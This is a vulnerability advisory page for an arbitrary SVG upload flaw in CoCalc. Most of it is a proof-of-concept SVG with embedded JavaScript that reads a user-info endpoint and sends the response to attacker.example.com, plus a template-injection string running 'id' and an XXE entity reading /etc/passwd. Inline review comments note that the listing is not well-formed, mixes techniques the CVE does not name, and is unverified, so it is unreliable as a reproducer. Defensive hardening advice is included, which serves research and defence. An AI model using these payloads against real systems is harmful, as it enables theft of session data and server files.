An arbitrary file upload vulnerability in SageMath, Inc CoCalc before commit 0d2ff58 allows attackers to execute arbitrary code via uploading a crafted SVG file.
CVSS Details
CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Configurations (Affected Products)
No configuration data available.
SageMath CoCalc < commit 0d2ff58
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- CVE-2025-61514 PoC: Malicious SVG file for arbitrary code execution -->
<!-- Upload this file to CoCalc to trigger the vulnerability -->
<!-- NOTE(review): this listing combines three separate techniques (script embedded
     in SVG, template injection, XXE). The CVE description names only a crafted SVG
     upload; which of these applies to CoCalc is not established by this file. -->
<!-- NOTE(review): the listing is not well-formed XML as written, so read it as
     illustrative rather than as a validated reproducer. -->
<!-- Defensive baseline for user-uploaded SVG: sanitize or rasterize on upload, serve
     uploads with Content-Disposition: attachment or from a separate origin, and apply
     a restrictive Content-Security-Policy to the path that serves them. -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<!-- Embedded JavaScript for client-side execution -->
<!-- A script element in SVG runs only when the file is rendered as a document in the
     serving origin; it runs in the viewer's browser, not on the server. -->
<script type="application/ecmascript">
<![CDATA[
// Exfiltrate data or perform malicious actions
// Same-origin GET issued from the page that renders this SVG, so it carries whatever
// cookies the viewer's browser holds for that origin.
// NOTE(review): the endpoint path is taken as given; not verified against CoCalc's API.
var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/v1/user/info", true);
xhr.onreadystatechange = function() {
// readyState 4 means the request has completed.
if (xhr.readyState == 4) {
// Send stolen data to attacker's server
// The response body is base64-encoded and placed in the query string of an image
// request. A CSP img-src allow-list on the serving origin blocks this channel, and
// the long base64 parameter is a usable signal in proxy or egress logs.
var img = new Image();
img.src = "https://attacker.example.com/steal?data=" + btoa(xhr.responseText);
}
};
xhr.send();
// Attempt server-side template injection via SVG metadata
// NOTE(review): the lines below only append a <metadata> node to the in-browser DOM;
// nothing visible here sends the string to a server, so this code does not reach any
// server-side template engine. The CVE description does not mention template injection.
var payload = "{{system('id > /tmp/pwned')}}";
var meta = document.createElement("metadata");
meta.textContent = payload;
document.documentElement.appendChild(meta);
]]>
</script>
<!-- XXE payload for potential server-side exploitation -->
<!-- Declares an external entity that points at a local file and references it in the
     <text> element that follows. This matters only if some server-side component
     parses the upload with DTD processing enabled; the CVE description does not say
     one does. Parsers that handle untrusted SVG should have DTD processing and
     external entity resolution disabled. -->
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<text x="10" y="50" font-size="14">&xxe;</text>
<!-- Visual content to make the file appear legitimate -->
<!-- Harmless-looking shapes mean visual inspection does not reveal the script above;
     upload checks need to inspect the markup itself. -->
<rect x="0" y="0" width="200" height="200" fill="lightblue"/>
<circle cx="100" cy="100" r="50" fill="red"/>
<text x="60" y="105" font-size="16" fill="white">POC</text>
</svg>